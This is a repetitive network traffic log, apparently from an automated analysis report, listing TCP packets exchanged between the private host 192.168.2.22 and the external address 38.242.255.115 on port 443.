Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
